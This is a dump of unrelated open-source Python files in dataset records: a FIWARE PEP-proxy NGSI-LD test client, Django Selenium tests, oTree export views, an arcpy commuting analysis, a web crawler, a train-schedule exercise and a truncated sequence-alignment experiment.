ssl\n\nnoEncryptedKeys=[\"@id\",\"@type\",\"@context\"]\n\ndef get_chunk_size(resp):\n size_str = resp.read(2)\n if(size_str.decode('utf8').replace(\"'\", '\"')==\"\"):\n return 0\n while size_str[-2:] != b\"\\r\\n\":\n size_str += resp.read(1)\n return int(size_str[:-2], 16)\n\ndef get_chunk_data(resp,chunk_size):\n data = resp.read(chunk_size)\n resp.read(2)\n return data\n\ndef getstatusoutput(command):\n process = Popen(command, stdout=PIPE,stderr=PIPE)\n out, err = process.communicate()\n\n #print(\"out\")\n #print(out)\n #print(\"err\")\n #print(err)\n\n return (process.returncode, out)\n\n#This process consider ONLY a JSON format.\ndef decipherBodyAttributes(body):\n\n bodyBackUp = body\n\n try:\n\n for key in body:\n try:\n\n if(key.lower() not in noEncryptedKeys):\n #Verify, encriptation type.\n\n testEncryptCPABE = False\n\n testEncryptCPABE_CASE = False\n\n for key2 in body[key]:\n if (key2 == \"https://uri.etsi.org/ngsi-ld/default-context/encrypt_cpabe\"):\n if (body[key][key2][\"https://uri.etsi.org/ngsi-ld/hasValue\"]==\"encrypt_cpabe\"):\n testEncryptCPABE = True\n testEncryptCPABE_CASE = 1\n break\n\n if (key2 == \"encrypt_cpabe\"):\n if (body[key][key2][\"value\"]==\"encrypt_cpabe\"):\n testEncryptCPABE = True\n testEncryptCPABE_CASE = 2\n break\n\n\n if(testEncryptCPABE): #CPABE ENCRYPTATION\n\n if (testEncryptCPABE_CASE == 1):\n #Decipher attribute value\n codeValue, outValue = getstatusoutput([\"java\", \"-jar\", \"./conf_files/jar/cpabe_decipher.jar\",\n str(body[key][\"https://uri.etsi.org/ngsi-ld/hasValue\"])])\n\n if(codeValue == 0):\n #Assign decipher attribute value\n body[key][\"https://uri.etsi.org/ngsi-ld/hasValue\"] = outValue.decode('utf8')\n\n if (testEncryptCPABE_CASE == 2):\n\n #Decipher attribute value\n codeValue, outValue = getstatusoutput([\"java\", \"-jar\", \"./conf_files/jar/cpabe_decipher.jar\",\n str(body[key][\"value\"])])\n\n if(codeValue == 0):\n #Assign decipher attribute value\n body[key][\"value\"] = outValue.decode('utf8')\n\n except Exception as e:\n print(\"Error procesing key: \" + key)\n print(e)\n #return bodyBackUp, False\n\n return body, True\n\n except:\n return bodyBackUp, False\n\ndef pp_json(json_thing, sort=True, indents=4):\n if type(json_thing) is str:\n print(json.dumps(json.loads(json_thing), sort_keys=sort, indent=indents))\n\n else:\n print(json.dumps(json_thing, sort_keys=sort, indent=indents))\n return None\n\n\nif __name__ == '__main__':\n\n gcontext = ssl.SSLContext()\n\n #Obtain configuracion from config.cfg file.\n cfg = configparser.ConfigParser() \n cfg.read([\"./config.cfg\"]) \n \n keyrock_protocol = cfg.get(\"GENERAL\", \"keyrock_protocol\")\n keyrock_host = cfg.get(\"GENERAL\", \"keyrock_host\")\n keyrock_port = cfg.get(\"GENERAL\", \"keyrock_port\")\n keyrock_user = cfg.get(\"GENERAL\", \"keyrock_user\")\n keyrock_pass = cfg.get(\"GENERAL\", \"keyrock_pass\")\n\n capman_protocol = cfg.get(\"GENERAL\", \"capman_protocol\")\n capman_host = cfg.get(\"GENERAL\", \"capman_host\")\n capman_port = cfg.get(\"GENERAL\", \"capman_port\")\n\n policy_action = cfg.get(\"GENERAL\", \"policyGET_action\")\n policy_device = cfg.get(\"GENERAL\", \"policyGET_device\")\n policy_resource = cfg.get(\"GENERAL\", \"policyGET_resource\")\n\n pep_protocol = cfg.get(\"GENERAL\", \"pep_protocol\")\n pep_host = cfg.get(\"GENERAL\", \"pep_host\")\n pep_port = cfg.get(\"GENERAL\", \"pep_port\")\n\n headers = {\"Content-Type\":\"application/json\"}\n body = json.dumps({\"name\":keyrock_user,\"password\":keyrock_pass}).encode()\n\n keyRockMethod=\"POST\"\n keyRockUri=\"/v1/auth/tokens\"\n \n print(\"******* Sending authentication request to KeyRock... *******\")\n print(\"Method: \" + keyRockMethod)\n print(\"URI: \" + keyRockUri)\n print(\"Headers: \" + str(headers))\n print(\"Body: \" + str(body))\n\n if(keyrock_protocol.upper()==\"http\".upper() or keyrock_protocol.upper()==\"https\".upper()):\n \n if(keyrock_protocol.upper()==\"http\".upper()):\n conn = http.client.HTTPConnection(keyrock_host,keyrock_port)\n else:\n #conn = http.client.HTTPSConnection(keyrock_host,keyrock_port,\n # key_file=\"./certs/idm-2018-key.pem\",\n # cert_file=\"./certs/idm-2018-cert.pem\",\n # context=gcontext)\n\n conn = http.client.HTTPSConnection(keyrock_host,keyrock_port,\n context=gcontext)\n\n conn.request(keyRockMethod, keyRockUri, body, headers)\n response = conn.getresponse()\n\n status = response.status\n reason = response.reason\n data = response.read()\n conn.close()\n\n if(status==201):\n #Example format: keyRockToken = \"4aece71b-8c22-4012-9397-608da3f58c6c\"\n keyRockToken = response.headers[\"X-Subject-Token\"]\n\n print(\"\\nAUTH SUCCESS: Authentication Keyrock Token obtained : \" + keyRockToken)\n\n headers = {\"Content-Type\":\"application/json\"}\n body = json.dumps({\"token\":keyRockToken,\"ac\":policy_action,\"de\":policy_device,\"re\":policy_resource}).encode()\n\n capmanMethod=\"POST\"\n capmanUri=\"/\"\n\n print(\"\\n******* Sending authorisation request to Capability Manager... *******\")\n print(\"Method: \" + capmanMethod)\n print(\"URI: \" + capmanUri)\n print(\"Headers: \" + str(headers))\n print(\"Body: \" + str(body))\n\n if(capman_protocol.upper()==\"http\".upper()):\n conn = http.client.HTTPConnection(capman_host,capman_port)\n else:\n #conn = http.client.HTTPSConnection(capman_host,capman_port,\n # key_file=\"./certs/idm-2018-key.pem\",\n # cert_file=\"./certs/idm-2018-cert.pem\",\n # context=gcontext)\n conn = http.client.HTTPSConnection(capman_host,capman_port,\n context=gcontext)\n\n conn.request(capmanMethod, capmanUri, body, headers)\n response = conn.getresponse()\n\n status = response.status\n reason = response.reason\n data = response.read()\n conn.close()\n\n if(status==200):\n\n bodyJSON = json.loads(data.decode('utf8').replace(\"'\", '\"'))\n print(\"\\nSUCCESS: Authorisation Granted --> Capability token obtained : \" + str(bodyJSON))\n\n\n headers = {\"Accept\":\"application/ld+json\",\n \"x-auth-token\":json.dumps(bodyJSON)}\n\n print(\"\\n******* Sending NGSI-LD query to MDR through PEP_PROXY... *******\")\n print(\"Method: \" + policy_action)\n print(\"URI: \" + policy_resource)\n print(\"Headers: \" + str(headers))\n\n if(pep_protocol.upper()==\"http\".upper()):\n conn = http.client.HTTPConnection(pep_host,pep_port)\n else:\n #conn = http.client.HTTPSConnection(pep_host,pep_port,\n # key_file=\"./certs/idm-2018-key.pem\",\n # cert_file=\"./certs/idm-2018-cert.pem\",\n # context=gcontext)\n conn = http.client.HTTPSConnection(pep_host,pep_port,\n context=gcontext)\n conn.request(policy_action, policy_resource, None, headers)\n response = conn.getresponse()\n\n status = response.status\n reason = response.reason\n #data = response.read()\n headersPEPResponse = response.headers\n\n response.chunked = False\n respBody = \"\"\n while True:\n chunk_size = get_chunk_size(response)\n if (chunk_size == 0):\n break\n else:\n chunk_data = get_chunk_data(response,chunk_size)\n #print(\"Chunk Received: \" + chunk_data.decode())\n respBody += chunk_data.decode()\n\n conn.close()\n\n print(\"\\nSUCCESS: NGSI-LD response:\\n\")\n print(\"* Code: \" + str(status))\n print(\"* Message: \" + str(reason))\n print(\"* Headers:\\n\" + str(headersPEPResponse))\n print(\"\\n* Body(cpabe_cipher):\\n\" + json.dumps(json.loads(respBody), sort_keys=True, indent=4))\n\n decipherRespBody = json.loads(respBody)\n\n if (decipherRespBody.get(\"@id\") or decipherRespBody.get(\"id\")): \n decipherRespBody,statusDecipher = decipherBodyAttributes(decipherRespBody)\n\n #print(type(decipherRespBody))\n #print(\"* DecipherBody:\")\n #print(json.loads(json.dumps(decipherRespBody)))\n #pp_json(decipherRespBody)\n\n print(\"\\n* Body(cpabe_decipher):\\n\" + json.dumps(decipherRespBody, sort_keys=True, indent=4))\n\n else:\n print(\"\\nFAILURE Authorisation Error --> Capability Manager.\")\n print(data)\n else:\n print(\"\\nFAILURE: Authentication Error --> Key Rock\")\n print(json.loads(data.decode('utf8').replace(\"'\", '\"')))\n else:\n print(\"Incorrect value for 'keyrock_protocol': \" + keyrock_protocol)\n\n","sub_path":"Extra/Security-Components/authorisation/Py_PEP-Proxy/test/python/Client_NGSILD/TestGET.py","file_name":"TestGET.py","file_ext":"py","file_size_in_byte":10641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"357759725","text":"# Projekt aus dem Buch:\r\n# \"Test-driven development with Python\r\n#\r\n# Erstellt wird eine To-Do-Listen-WebApp \r\n\r\nfrom django.test import LiveServerTestCase\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.common.exceptions import WebDriverException\r\nimport time\r\n\r\nMAX_WAIT = 10\r\n\r\nclass NewVisitorTest(LiveServerTestCase):\r\n def setUp(self):\r\n self.browser = webdriver.Firefox()\r\n \r\n def tearDown(self):\r\n self.browser.quit()\r\n\r\n def wait_for_row_in_list_table(self, row_text):\r\n start_time = time.time()\r\n while True:\r\n try:\r\n table = self.browser.find_element_by_id('id_list_table')\r\n rows = table.find_elements_by_tag_name('tr')\r\n self.assertIn(row_text, [row.text for row in rows])\r\n return\r\n except (AssertionError, WebDriverException) as e:\r\n if time.time() - start_time > MAX_WAIT:\r\n raise e\r\n time.sleep(0.5)\r\n\r\n def test_can_start_a_list_for_one_user(self):\r\n # Edith hat von einer neuen, coolen Online-App gehört, die \r\n # To-Do-Listen verwalten kann. Sie geht gleich mal auf die \r\n # Homepage..\r\n self.browser.get(self.live_server_url)\r\n\r\n # Sie bemerkt, dass der Seiten-Titel den Text \"To-Do\" \r\n # beinhaltet\r\n self.assertIn('To-Do', self.browser.title)\r\n header_text = self.browser.find_element_by_tag_name('h1').text\r\n self.assertIn('To-Do', header_text)\r\n\r\n # In eine Textbox kann sie einen ersten To-Do-Eintrag eingeben\r\n inputbox = self.browser.find_element_by_id('id_new_item')\r\n self.assertEqual(\r\n inputbox.get_attribute('placeholder'),\r\n 'Enter a to-do item'\r\n )\r\n\r\n # Sie schreibt \"Kaufe Pfauenfedern\" in die Textbox\r\n inputbox.send_keys('Kaufe Pfauenfedern')\r\n\r\n # Sobald sie ENTER drückt, wird die Seite aktualisiert und \r\n # zeigt nun an \"1: Kaufe Pfauenfedern\" als ein Eintrag in\r\n # einer To-Do-Listen-Tabelle\r\n inputbox.send_keys(Keys.ENTER)\r\n time.sleep(1)\r\n self.wait_for_row_in_list_table('1: Kaufe Pfauenfedern')\r\n\r\n # Die Textbox zur Eingabe von To-Do-Einträgen ist immer noch \r\n # da. Sie gibt nun ein: \"Stelle die Pfauenfedern in eine Vase\"\r\n inputbox = self.browser.find_element_by_id('id_new_item')\r\n inputbox.send_keys('Stelle die Pfauenfedern in eine Vase')\r\n inputbox.send_keys(Keys.ENTER)\r\n time.sleep(1)\r\n\r\n # Die Seite aktualisiert sich erneut und zeigt nun beide \r\n # Einträge in der To-Do-Liste an\r\n self.wait_for_row_in_list_table('1: Kaufe Pfauenfedern')\r\n self.wait_for_row_in_list_table('2: Stelle die Pfauenfedern in eine Vase')\r\n\r\n # Edith fragt sich, ob die Seite sich ihre Liste merken kann. \r\n # Dann bemerkt sie, dass die Seite eine individuelle URL für \r\n # sie erstellt hat -- Dazu gibt es auch einen erklärenden Text\r\n #self.fail('Finish the test!')\r\n\r\n # Sie ruft die URL auf - Ihre To-Do-Liste ist noch da.\r\n\r\n def test_multiple_users_can_start_lists_at_different_urls(self):\r\n # Edith startet eine neue To-do-Liste\r\n self.browser.get(self.live_server_url)\r\n inputbox = self.browser.find_element_by_id('id_new_item')\r\n inputbox.send_keys('Kaufe Pfauenfedern')\r\n inputbox.send_keys(Keys.ENTER)\r\n self.wait_for_row_in_list_table('1: Kaufe Pfauenfedern')\r\n\r\n # Sie bemerkt, dass ihre Liste eine individuelle URL hat\r\n edith_list_url = self.browser.current_url\r\n self.assertRegex(edith_list_url, '/lists/.+')\r\n\r\n # Nun besucht der neue Benutzer Francis die Seite\r\n\r\n ## Wir starten eine neue Browser-Sitzung um sicherzugehen,\r\n ## dass keine Information (Cookies etc) aus Ediths Sitzung\r\n ## wieder verwendet wird\r\n self.browser.quit()\r\n self.browser = webdriver.Firefox()\r\n\r\n # Francis besucht die Homepage. Ediths Liste ist nicht zu \r\n # sehen\r\n self.browser.get(self.live_server_url)\r\n page_text = self.browser.find_element_by_tag_name('body').text\r\n self.assertNotIn('Kaufe Pfauenfedern', page_text)\r\n self.assertNotIn('Stelle die Pfauenfedern in eine Vase', page_text)\r\n\r\n # Francis startet eine neue Liste, indem er ein neues Item \r\n # eingibt\r\n inputbox = self.browser.find_element_by_id('id_new_item')\r\n inputbox.send_keys('Kaufe Milch')\r\n inputbox.send_keys(Keys.ENTER)\r\n self.wait_for_row_in_list_table('1: Kaufe Milch')\r\n\r\n # Francis bekommt seine eigene URL\r\n francis_list_url = self.browser.current_url\r\n self.assertRegex(francis_list_url, '/lists/.+')\r\n self.assertNotEqual(francis_list_url, edith_list_url)\r\n\r\n # Erneut ist Edith Liste nicht zu sehen\r\n page_text = self.find_element_by_tag_name('body').text\r\n self.assertNotIn('Kaufe Pfauenfedern', page_text)\r\n self.assertIn('Kaufe Milch', page_text)\r\n","sub_path":"functional_tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"506452647","text":"from io import StringIO\nimport csv\nimport datetime\n\nfrom starlette.responses import Response\nfrom starlette.endpoints import HTTPEndpoint\nfrom . import cbv\n\nimport otree.common\nimport otree.models\nimport otree.export\nfrom otree.models.participant import Participant\nfrom otree.models.session import Session\nfrom otree.models_concrete import ChatMessage\nfrom otree.database import dbq\n\n\nclass Export(cbv.AdminView):\n url_pattern = '/export'\n\n def vars_for_template(self):\n\n # can't use settings.OTREE_APPS, because maybe the app\n # was removed from SESSION_CONFIGS.\n app_names_with_data = set()\n for session in dbq(Session):\n for app_name in session.config['app_sequence']:\n app_names_with_data.add(app_name)\n\n custom_export_apps = []\n for app_name in app_names_with_data:\n models_module = otree.common.get_models_module(app_name)\n if getattr(models_module, 'custom_export', None):\n custom_export_apps.append(app_name)\n\n return dict(\n db_is_empty=not bool(dbq(Participant).first()),\n app_names=app_names_with_data,\n chat_messages_exist=bool(dbq(ChatMessage).first()),\n custom_export_apps=custom_export_apps,\n )\n\n\ndef get_csv_http_response(buffer: StringIO, filename_prefix) -> Response:\n buffer.seek(0)\n response = Response(buffer.read())\n date = datetime.date.today().isoformat()\n response.headers['Content-Type'] = 'text/csv'\n response.headers[\n 'Content-Disposition'\n ] = f'attachment; filename=\"{filename_prefix}-{date}.csv\"'\n return response\n\n\nclass ExportSessionWide(HTTPEndpoint):\n '''used by data page'''\n\n url_pattern = '/ExportSessionWide/{code}'\n\n def get(self, request):\n code = request.path_params['code']\n buf = StringIO()\n if bool(request.GET.get('excel')):\n # BOM\n buf.write('\\ufeff')\n otree.export.export_wide(buf, session_code=code)\n return get_csv_http_response(buf, 'all_apps_wide')\n\n\nclass ExportPageTimes(HTTPEndpoint):\n\n url_pattern = '/ExportPageTimes'\n\n def get(self, request):\n buf = StringIO()\n otree.export.export_page_times(buf)\n response = get_csv_http_response(buf, 'PageTimes')\n return response\n\n\nclass ExportChat(HTTPEndpoint):\n\n url_pattern = '/chat_export'\n\n def get(self, request):\n buf = StringIO()\n column_names = [\n 'session_code',\n 'id_in_session',\n 'participant_code',\n 'channel',\n 'nickname',\n 'body',\n 'timestamp',\n ]\n\n rows = (\n dbq(ChatMessage)\n .join(Participant)\n .order_by(ChatMessage.timestamp)\n .with_entities(\n Participant._session_code,\n Participant.id_in_session,\n Participant.session_id,\n ChatMessage.channel,\n ChatMessage.nickname,\n ChatMessage.body,\n ChatMessage.timestamp,\n )\n )\n\n writer = csv.writer(buf)\n writer.writerows([column_names])\n writer.writerows(rows)\n response = get_csv_http_response(buf, 'ChatMessages')\n return response\n","sub_path":"otree/views/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262407128","text":"# -*- coding: UTF-8 -*-\r\nimport arcpy\r\nimport sys\r\nfrom statistics import statsGrid\r\nreload(sys)\r\nsys.setdefaultencoding('utf-8')\r\n\r\n\r\n# - 数据\r\n# -- 区域空间数据\r\nmobileGridFeature = \"wh_grid_250_54\" # 手机划分的格网数据\r\nidentifyPointJoinField = \"grid_id\" # 手机格网数据中的格网id字段,也是用来连接字段时识区域后点数据的id字段\r\nregionBoundaryFeature = \"BOUND_17\" # 统计识别区域数据\r\nregionIDFieldStr = \"QBM\" # 区域代码字段\r\n# -- 手机结果表格数据\r\n# --- 统计表\r\ngrid_WH = \"WH\" # 格子内居住工作人数数据表\r\ngrid_ID = \"GRID_ID\" # WH表格中代表格子id的字段\r\n# --- 流向表\r\nwork2HomeTable = \"W2H\" # 在某格工作到在某格居住数据表\r\nhome2WorkTable = \"H2W\" # 在某格居住到在某格工作数据表\r\nworkGridID = \"GRID_ID_W\" # W2H、H2W两张表里代表工作地格子id的字段\r\nhomeGridID = \"GRID_ID_H\" # W2H、H2W两张表里代表居住地格子id的字段\r\n# --- 公共属性字段\r\nWORK_NUM = \"WORK_NUM\" # WH、W2H表中表示工作人数字段\r\nHOME_NUM = \"HOME_NUM\" # WH、H2W表中表示居住人数字段\r\n# - 工作空间\r\narcpy.env.workspace = \"C:/MData/WorkAndHome.gdb\"\r\nprint(\"前期导入 -- 100%\")\r\ntry:\r\n\r\n arcpy.env.overwriteOutput = True\r\n '''\r\n # 要素转点\r\n print(\"格网转点...\")\r\n mobilePointFeature = mobileGridFeature + \"2Point\" # 格网转点数据\r\n arcpy.FeatureToPoint_management(mobileGridFeature, mobilePointFeature, \"CENTROID\")\r\n print(\"格网转点 -- 100%\")\r\n # 识别区域\r\n print(\"点区域识别...\")\r\n identifyPointFeatures = mobilePointFeature + \"IdBound\" # 识别区域后的格网点数据\r\n arcpy.Identity_analysis(mobilePointFeature, regionBoundaryFeature, identifyPointFeatures)\r\n print(\"点区域识别 -- 100%\")\r\n # 添加和区域码相同的底端,表示工作格网区域码、居住格网区域码\r\n # Local variables:\r\n\r\n workRegionIDFieldStr = \"WORK_ID_\" + regionIDFieldStr # 工作地区域代码字段\r\n homeRegionIDFieldStr = \"HOME_ID_\" + regionIDFieldStr # 居住地区域代码字段\r\n arcpy.AddField_management(identifyPointFeatures, workRegionIDFieldStr, \"TEXT\")\r\n arcpy.AddField_management(identifyPointFeatures, homeRegionIDFieldStr, \"TEXT\")\r\n # Process: 计算字段\r\n calculateFieldExpression = \"[\" + regionIDFieldStr + \"]\" # 工作、居住地区域代码均等于区域代码\r\n arcpy.CalculateField_management(identifyPointFeatures, workRegionIDFieldStr, calculateFieldExpression, \"VB\", \"\")\r\n arcpy.CalculateField_management(identifyPointFeatures, homeRegionIDFieldStr, calculateFieldExpression, \"VB\", \"\")\r\n\r\n # 连接统计表格与识别区域后要素图层\r\n print(\"流向数据连接要素...\")\r\n\r\n idJoinKeepFields_Work = [workRegionIDFieldStr]\r\n idJoinKeepFields_Home = [homeRegionIDFieldStr]\r\n\r\n # 为工作地居住地流向及居住地工作地流向表格中的格网添加行政区域信息,并根据流出地-流入地(行政区域)进行汇总,得到一个流向转移矩阵\r\n # 分类汇总Work 2 Home\r\n arcpy.JoinField_management(work2HomeTable, workGridID,\r\n identifyPointFeatures, identifyPointJoinField, idJoinKeepFields_Work)\r\n arcpy.JoinField_management(work2HomeTable, homeGridID,\r\n identifyPointFeatures, identifyPointJoinField, idJoinKeepFields_Home)\r\n sWork2HomeFieldsList = [WORK_NUM]\r\n caseW2HFields = [workRegionIDFieldStr, homeRegionIDFieldStr]\r\n work2HomeTableSum = statsGrid.summaryStatisticsGrid2Region(work2HomeTable, sWork2HomeFieldsList, \"SUM\",\r\n caseW2HFields)\r\n # 分类汇总Home 2 Work\r\n arcpy.JoinField_management(home2WorkTable, homeGridID,\r\n identifyPointFeatures, identifyPointJoinField, idJoinKeepFields_Home)\r\n arcpy.JoinField_management(home2WorkTable, workGridID,\r\n identifyPointFeatures, identifyPointJoinField, idJoinKeepFields_Work)\r\n\r\n sHome2WorkFieldsList = [HOME_NUM]\r\n caseH2WFields = [homeRegionIDFieldStr, workRegionIDFieldStr]\r\n home2WorkTableSum = statsGrid.summaryStatisticsGrid2Region(home2WorkTable, sHome2WorkFieldsList, \"SUM\",\r\n caseH2WFields)\r\n\r\n # 汇总总体grid_WH 每个行政区内工作和居住的总人数\r\n arcpy.JoinField_management(grid_WH, grid_ID,\r\n identifyPointFeatures, identifyPointJoinField, [regionIDFieldStr])\r\n sFieldsList = [WORK_NUM, HOME_NUM]\r\n caseRegionFields = [regionIDFieldStr]\r\n grid_WHSum = statsGrid.summaryStatisticsGrid2Region(grid_WH, sFieldsList, \"SUM\", caseRegionFields)'''\r\n\r\n # 将表格数据导入到SHAPE文件中\r\n # 生成W2H OD数组[内,外]\r\n workRegionIDFieldStr = \"WORK_ID_\" + regionIDFieldStr # 工作地区域代码字段\r\n homeRegionIDFieldStr = \"HOME_ID_\" + regionIDFieldStr # 居住地区域代码字段\r\n work2HomeTableSum = \"W2H_Stats_SUM\"\r\n home2WorkTableSum = \"H2W_Stats_SUM\"\r\n grid_WHSum = \"WH_Stats_SUM\"\r\n statsW2HNumField = \"SUM_\" + WORK_NUM\r\n statsW2HODObj = statsGrid.statsWorkAndHomeOD(work2HomeTableSum, workRegionIDFieldStr, homeRegionIDFieldStr,\r\n statsW2HNumField)\r\n # 生成H2W OD数组[内,外]\r\n statsH2WNumField = \"SUM_\" + HOME_NUM\r\n statsH2WODObj = statsGrid.statsWorkAndHomeOD(home2WorkTableSum, homeRegionIDFieldStr, workRegionIDFieldStr,\r\n statsH2WNumField)\r\n # 计算指标\r\n WHBalanceQuota = statsGrid.calculateJobs_HousingBalance(regionBoundaryFeature, regionIDFieldStr,\r\n grid_WHSum, regionIDFieldStr,\r\n statsW2HNumField, statsH2WNumField,\r\n statsW2HODObj, statsH2WODObj)\r\n\r\nexcept Exception as err:\r\n print(err.args[0])\r\n","sub_path":"statistics/OperateOD_1.py","file_name":"OperateOD_1.py","file_ext":"py","file_size_in_byte":6098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368432693","text":"import xml.etree.ElementTree as ElementTree\nfrom threading import Thread\nfrom slugify import slugify\n\nfrom .parser import Parser\nfrom .requester import Requester\nfrom .filer import Filer\nfrom .logger import Logger\n\n\nclass Crawler:\n\n requester = None\n filer = None\n parser = None\n logger = None\n\n def __init__(self, config_file_path, output_path):\n self.requester = Requester()\n self.filer = Filer()\n self.logger = Logger('crawler')\n self.output_path = output_path if output_path else '.'\n\n thread = None\n\n for site in self.set_requests(Crawler, config_file_path):\n thread = Thread(target=self.crawl, args=(site,))\n thread.start()\n\n if thread:\n thread.join()\n\n def crawl(self, site):\n index_content = self.requester.get_content(site.get('domain'))\n\n if len(index_content) > 0:\n self.filer.prepare_csv(self.output_path + '/' + slugify(site.get('name')) + '.csv',\n (info.get('name') for info in site.find('page').findall('info')))\n\n thread = None\n \n for page_link in self.get_pages_links(Crawler, site.get('domain'), site.find('page'), index_content):\n thread = Thread(target=self.threaded_crawl, args=(site, page_link,))\n thread.start()\n\n if thread:\n thread.join()\n else:\n self.logger.log_warning('No content found in ' + site.get('domain'))\n \n def threaded_crawl(self, site, page_link):\n page_content = self.requester.get_content(page_link)\n\n if len(page_content) > 0:\n page_infos = self.get_page_infos(Crawler, site.find('page'), page_link, page_content)\n self.filer.write_content(self.output_path + '/' + slugify(site.get('name')) + '.csv',\n page_infos + '\\n', 'a')\n else:\n self.logger.log_warning('No content found in ' + page_link)\n\n @staticmethod\n def set_requests(cls, config_file_path):\n config_file = ElementTree.parse(config_file_path)\n config_file_root_node = config_file.getroot()\n data = []\n\n for index, site in enumerate(config_file_root_node.findall('site')):\n data.append(site)\n\n return data\n\n @staticmethod\n def get_pages_links(cls, domain, page, index_content):\n parser = Parser(index_content)\n pages_links = []\n \n for match in parser.get_all_by_regex(page.get('uripattern')):\n\n if isinstance(match, tuple):\n pages_links.append(domain + match[0])\n else:\n pages_links.append(domain + match)\n\n return set(pages_links)\n\n @staticmethod\n def get_page_infos(cls, page, link, page_content):\n parser = Parser(page_content)\n page_infos = '' \n\n for info in parser.page_parser(page):\n page_infos += info + ','\n \n return page_infos + link\n","sub_path":"webcrawler/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503496455","text":"import pandas as pd\nfrom datetime import time\n\nflag = True\nwhile flag:\n\n # информация поездах\n a = [{'train_code': '887B', 'station': 'Lipki', 'time_arrive': time(12, 00)},\n {'train_code': '411C', 'station': 'Kyiv ', 'time_arrive': time(10, 00)},\n {'train_code': '743L', 'station': 'Lipki', 'time_arrive': time(12, 00)},\n {'train_code': '113F', 'station': 'Rivne', 'time_arrive': time(11, 00)}]\n\n # вводим диапазон времени приходящих поездов\n\n while True:\n try:\n start_time = time(hour=int(input(\"Enter start hours: \")), minute=int(input(\"Enter start minutes: \")))\n end_time = time(hour=int(input(\"Enter last hours: \")), minute=int(input(\"Enter last minutes: \")))\n break\n except ValueError:\n print('Enter an integers!')\n s = sorted(a, key=lambda x: x['time_arrive'])\n\n # проверяем прибытие каких поездов совпадает с заданым нами диапазоном\n\n for train in s:\n if start_time <= train.get('time_arrive') <= end_time:\n print(train)\n df = pd.DataFrame(a)\n res = df.groupby([\"time_arrive\", \"station\"]).filter(lambda x: len(x) > 1)\n count = len(res)\n\n # если среди маршрутов есть такие, что приходят на одну станцию в одно и то же время, выводим ошибку и просим ввести новые данные\n\n for i in res[\"time_arrive\"].to_list():\n\n if (start_time <= i <= end_time) and (count >= 2):\n print(f'There are {count} wrong destinations')\n print('Accident error. Choose the other time range please.')\n break\n\n # если \"ошибочных маршрутов\" нет, прекращаем работу программы\n\n else:\n flag = False\n break\n","sub_path":"1.4.2_pandas(fixed).py","file_name":"1.4.2_pandas(fixed).py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"414762079","text":"import os\nimport sys\nsys.path.append(\"../../bin\")\nimport MSA_cleaning as MSA\nimport random\nimport Mantel_test as Mantel\n\n#see experiment description in the associated report\n\n#dictionnary of codons used for generating random DNA chains\ngencode = {\n 'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',\n 'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',\n 'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',\n 'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',\n 'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',\n 'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',\n 'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',\n 'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',\n 'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',\n 'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',\n 'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',\n 'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',\n 'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',\n 'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',\n 'TAC':'Y', 'TAT':'Y', 'TAA':'_', 'TAG':'_',\n 'TGC':'C', 'TGT':'C', 'TGA':'_', 'TGG':'W'}\n \n \n#data control\ndef check_data(filename):\n filecontent = open(filename,\"r\").read()\n seqs = filecontent.split('>')[1:]\n for seq in seqs:\n aaseq = seq.split(\"\\n\")[1]\n #check sequence lenght\n if len(aaseq)<50:\n return False\n #check sequence composition\n for aa in aaseq:\n if aa!='-' and aa not in gencode.values():\n return False\n return True\n\n#We test basic cases in further experiment (1, 2 and 3)\ndef check_trivial(filename):\n pass\n\n#generation of sequences presenting basic noise characteristics\n#first col has more than 50% indel\n#col 10 has more than 50% uniq aa\n#last col : no aa appears more than twice\ndef check_basic_synth():\n seq1=\"\".join([\"A\"]*30)\n seq2='-'+seq1[:-1]\n seq2=list(seq2)\n seq2[10]=\"L\"\n seq2[-1]=\"L\"\n seq2=\"\".join(seq2)\n seq3='-'+seq1[:-1]\n seq3=list(seq3)\n seq3[10]=\"C\"\n seq3[-1]=\"L\"\n seq3=\"\".join(seq3)\n seq4='-'+seq1[:-1]\n seq4=list(seq4)\n seq4[10]=\"D\"\n seq4=\"\".join(seq4)\n print(seq1)\n print(seq2)\n print(seq3)\n print(seq4)\n filetest=open(\"test.txt\",'w')\n filetest.write(\">seq1\\n\" + seq1 + '\\n'+ \">seq2\\n\"+seq2 + '\\n' +\">seq3\\n\"+ seq3 + '\\n' +\">seq4\\n\" +seq4)\n filetest.close()\n a=MSA.MSA_cleaning(\"test.txt\", None)\n a.treatmsa()\n print(a.alignment)\n os.remove(\"test.txt\")\n\n\n#generate random msa, to see what kind of random tree and random pearson coeff \n#we obtain comparing to real MSA\ndef check_advance_synth():\n def gen_aleat_seqs():\n seqs=[]\n #first aa for the 16 seqs of the msa\n for i in range(16):\n aa=random.choice(list(gencode.values()))\n if (aa=='_'):\n aa='-'\n seqs.append([aa])\n for i in range(200):\n for i in range(16):\n 